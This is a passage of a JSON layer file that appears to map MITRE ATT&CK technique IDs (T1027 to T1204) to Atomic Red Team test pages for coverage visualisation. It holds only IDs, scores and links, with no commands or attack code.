Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.004/T1027.004.md"}]},{"techniqueID":"T1027","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.004/T1027.004.md"}]},{"techniqueID":"T1027","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027/T1027.md"}]},{"techniqueID":"T1030","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1030/T1030.md"}]},{"techniqueID":"T1033","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1033/T1033.md"}]},{"techniqueID":"T1036.003","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.003/T1036.003.md"}]},{"techniqueID":"T1036","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.003/T1036.003.md"}]},{"techniqueID":"T1036.004","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.004/T1036.004.md"}]},{"techniqueID":"T1036","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.004/T1036.004.md"}]},{"techniqueID":"T1036.005","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.005/T1036.005.md"}]},{"techniqueID":"T1036","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.005/T1036.005.md"}]},{"techniqueID":"T1036.006","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.006/T1036.006.md"}]},{"techniqueID":"T1036","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.006/T1036.006.md"}]},{"techniqueID":"T1036","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036/T1036.md"}]},{"techniqueID":"T1037.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.001/T1037.001.md"}]},{"techniqueID":"T1037","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.001/T1037.001.md"}]},{"techniqueID":"T1037.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.002/T1037.002.md"}]},{"techniqueID":"T1037","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.002/T1037.002.md"}]},{"techniqueID":"T1037.004","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.004/T1037.004.md"}]},{"techniqueID":"T1037","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.004/T1037.004.md"}]},{"techniqueID":"T1037.005","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.005/T1037.005.md"}]},{"techniqueID":"T1037","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.005/T1037.005.md"}]},{"techniqueID":"T1040","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1040/T1040.md"}]},{"techniqueID":"T1041","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1041/T1041.md"}]},{"techniqueID":"T1046","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1046/T1046.md"}]},{"techniqueID":"T1047","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1047/T1047.md"}]},{"techniqueID":"T1048.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1048.002/T1048.002.md"}]},{"techniqueID":"T1048","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1048.002/T1048.002.md"}]},{"techniqueID":"T1048.003","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1048.003/T1048.003.md"}]},{"techniqueID":"T1048","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1048.003/T1048.003.md"}]},{"techniqueID":"T1048","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1048/T1048.md"}]},{"techniqueID":"T1049","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1049/T1049.md"}]},{"techniqueID":"T1053.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.001/T1053.001.md"}]},{"techniqueID":"T1053","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.001/T1053.001.md"}]},{"techniqueID":"T1053.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.002/T1053.002.md"}]},{"techniqueID":"T1053","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.002/T1053.002.md"}]},{"techniqueID":"T1053.003","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.003/T1053.003.md"}]},{"techniqueID":"T1053","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.003/T1053.003.md"}]},{"techniqueID":"T1053.004","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.004/T1053.004.md"}]},{"techniqueID":"T1053","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.004/T1053.004.md"}]},{"techniqueID":"T1053.005","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.005/T1053.005.md"}]},{"techniqueID":"T1053","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.005/T1053.005.md"}]},{"techniqueID":"T1053.006","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.006/T1053.006.md"}]},{"techniqueID":"T1053","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.006/T1053.006.md"}]},{"techniqueID":"T1053.007","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.007/T1053.007.md"}]},{"techniqueID":"T1053","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.007/T1053.007.md"}]},{"techniqueID":"T1055.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.001/T1055.001.md"}]},{"techniqueID":"T1055","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.001/T1055.001.md"}]},{"techniqueID":"T1055.004","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.004/T1055.004.md"}]},{"techniqueID":"T1055","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.004/T1055.004.md"}]},{"techniqueID":"T1055.012","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.012/T1055.012.md"}]},{"techniqueID":"T1055","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.012/T1055.012.md"}]},{"techniqueID":"T1055","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055/T1055.md"}]},{"techniqueID":"T1056.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.001/T1056.001.md"}]},{"techniqueID":"T1056","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.001/T1056.001.md"}]},{"techniqueID":"T1056.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.002/T1056.002.md"}]},{"techniqueID":"T1056","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.002/T1056.002.md"}]},{"techniqueID":"T1056.004","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.004/T1056.004.md"}]},{"techniqueID":"T1056","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.004/T1056.004.md"}]},{"techniqueID":"T1057","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1057/T1057.md"}]},{"techniqueID":"T1059.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.001/T1059.001.md"}]},{"techniqueID":"T1059","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.001/T1059.001.md"}]},{"techniqueID":"T1059.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.002/T1059.002.md"}]},{"techniqueID":"T1059","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.002/T1059.002.md"}]},{"techniqueID":"T1059.003","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.003/T1059.003.md"}]},{"techniqueID":"T1059","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.003/T1059.003.md"}]},{"techniqueID":"T1059.004","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.004/T1059.004.md"}]},{"techniqueID":"T1059","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.004/T1059.004.md"}]},{"techniqueID":"T1059.005","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.005/T1059.005.md"}]},{"techniqueID":"T1059","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.005/T1059.005.md"}]},{"techniqueID":"T1059.006","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.006/T1059.006.md"}]},{"techniqueID":"T1059","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.006/T1059.006.md"}]},{"techniqueID":"T1069.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1069.001/T1069.001.md"}]},{"techniqueID":"T1069","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1069.001/T1069.001.md"}]},{"techniqueID":"T1069.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1069.002/T1069.002.md"}]},{"techniqueID":"T1069","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1069.002/T1069.002.md"}]},{"techniqueID":"T1070.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.001/T1070.001.md"}]},{"techniqueID":"T1070","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.001/T1070.001.md"}]},{"techniqueID":"T1070.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.002/T1070.002.md"}]},{"techniqueID":"T1070","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.002/T1070.002.md"}]},{"techniqueID":"T1070.003","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.003/T1070.003.md"}]},{"techniqueID":"T1070","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.003/T1070.003.md"}]},{"techniqueID":"T1070.004","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.004/T1070.004.md"}]},{"techniqueID":"T1070","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.004/T1070.004.md"}]},{"techniqueID":"T1070.005","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.005/T1070.005.md"}]},{"techniqueID":"T1070","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.005/T1070.005.md"}]},{"techniqueID":"T1070.006","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.006/T1070.006.md"}]},{"techniqueID":"T1070","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.006/T1070.006.md"}]},{"techniqueID":"T1070","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070/T1070.md"}]},{"techniqueID":"T1071.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1071.001/T1071.001.md"}]},{"techniqueID":"T1071","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1071.001/T1071.001.md"}]},{"techniqueID":"T1071.004","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1071.004/T1071.004.md"}]},{"techniqueID":"T1071","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1071.004/T1071.004.md"}]},{"techniqueID":"T1072","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1072/T1072.md"}]},{"techniqueID":"T1074.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1074.001/T1074.001.md"}]},{"techniqueID":"T1074","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1074.001/T1074.001.md"}]},{"techniqueID":"T1078.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078.001/T1078.001.md"}]},{"techniqueID":"T1078","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078.001/T1078.001.md"}]},{"techniqueID":"T1078.003","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078.003/T1078.003.md"}]},{"techniqueID":"T1078","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078.003/T1078.003.md"}]},{"techniqueID":"T1078.004","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078.004/T1078.004.md"}]},{"techniqueID":"T1078","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078.004/T1078.004.md"}]},{"techniqueID":"T1082","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1082/T1082.md"}]},{"techniqueID":"T1083","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1083/T1083.md"}]},{"techniqueID":"T1087.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1087.001/T1087.001.md"}]},{"techniqueID":"T1087","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1087.001/T1087.001.md"}]},{"techniqueID":"T1087.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1087.002/T1087.002.md"}]},{"techniqueID":"T1087","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1087.002/T1087.002.md"}]},{"techniqueID":"T1090.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1090.001/T1090.001.md"}]},{"techniqueID":"T1090","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1090.001/T1090.001.md"}]},{"techniqueID":"T1091","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1091/T1091.md"}]},{"techniqueID":"T1095","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1095/T1095.md"}]},{"techniqueID":"T1098.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098.001/T1098.001.md"}]},{"techniqueID":"T1098","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098.001/T1098.001.md"}]},{"techniqueID":"T1098.004","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098.004/T1098.004.md"}]},{"techniqueID":"T1098","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098.004/T1098.004.md"}]},{"techniqueID":"T1098","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098/T1098.md"}]},{"techniqueID":"T1105","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1105/T1105.md"}]},{"techniqueID":"T1106","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1106/T1106.md"}]},{"techniqueID":"T1110.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.001/T1110.001.md"}]},{"techniqueID":"T1110","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.001/T1110.001.md"}]},{"techniqueID":"T1110.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.002/T1110.002.md"}]},{"techniqueID":"T1110","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.002/T1110.002.md"}]},{"techniqueID":"T1110.003","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.003/T1110.003.md"}]},{"techniqueID":"T1110","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.003/T1110.003.md"}]},{"techniqueID":"T1110.004","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.004/T1110.004.md"}]},{"techniqueID":"T1110","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.004/T1110.004.md"}]},{"techniqueID":"T1112","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1112/T1112.md"}]},{"techniqueID":"T1113","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1113/T1113.md"}]},{"techniqueID":"T1114.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1114.001/T1114.001.md"}]},{"techniqueID":"T1114","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1114.001/T1114.001.md"}]},{"techniqueID":"T1115","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1115/T1115.md"}]},{"techniqueID":"T1119","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1119/T1119.md"}]},{"techniqueID":"T1120","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1120/T1120.md"}]},{"techniqueID":"T1123","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1123/T1123.md"}]},{"techniqueID":"T1124","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1124/T1124.md"}]},{"techniqueID":"T1127.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1127.001/T1127.001.md"}]},{"techniqueID":"T1127","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1127.001/T1127.001.md"}]},{"techniqueID":"T1132.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1132.001/T1132.001.md"}]},{"techniqueID":"T1132","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1132.001/T1132.001.md"}]},{"techniqueID":"T1133","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1133/T1133.md"}]},{"techniqueID":"T1134.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1134.001/T1134.001.md"}]},{"techniqueID":"T1134","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1134.001/T1134.001.md"}]},{"techniqueID":"T1134.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1134.002/T1134.002.md"}]},{"techniqueID":"T1134","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1134.002/T1134.002.md"}]},{"techniqueID":"T1134.004","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1134.004/T1134.004.md"}]},{"techniqueID":"T1134","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1134.004/T1134.004.md"}]},{"techniqueID":"T1135","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1135/T1135.md"}]},{"techniqueID":"T1136.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.001/T1136.001.md"}]},{"techniqueID":"T1136","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.001/T1136.001.md"}]},{"techniqueID":"T1136.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.002/T1136.002.md"}]},{"techniqueID":"T1136","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.002/T1136.002.md"}]},{"techniqueID":"T1136.003","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.003/T1136.003.md"}]},{"techniqueID":"T1136","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.003/T1136.003.md"}]},{"techniqueID":"T1137.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1137.002/T1137.002.md"}]},{"techniqueID":"T1137","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1137.002/T1137.002.md"}]},{"techniqueID":"T1137.004","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1137.004/T1137.004.md"}]},{"techniqueID":"T1137","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1137.004/T1137.004.md"}]},{"techniqueID":"T1137.006","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1137.006/T1137.006.md"}]},{"techniqueID":"T1137","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1137.006/T1137.006.md"}]},{"techniqueID":"T1137","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1137/T1137.md"}]},{"techniqueID":"T1140","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1140/T1140.md"}]},{"techniqueID":"T1176","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1176/T1176.md"}]},{"techniqueID":"T1187","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1187/T1187.md"}]},{"techniqueID":"T1197","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1197/T1197.md"}]},{"techniqueID":"T1201","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1201/T1201.md"}]},{"techniqueID":"T1202","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1202/T1202.md"}]},{"techniqueID":"T1204.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1204.002/T1204.002.md"}]},{"techniqueID":"T1204","score":100,"enabled":true,"links":[{"label":"View 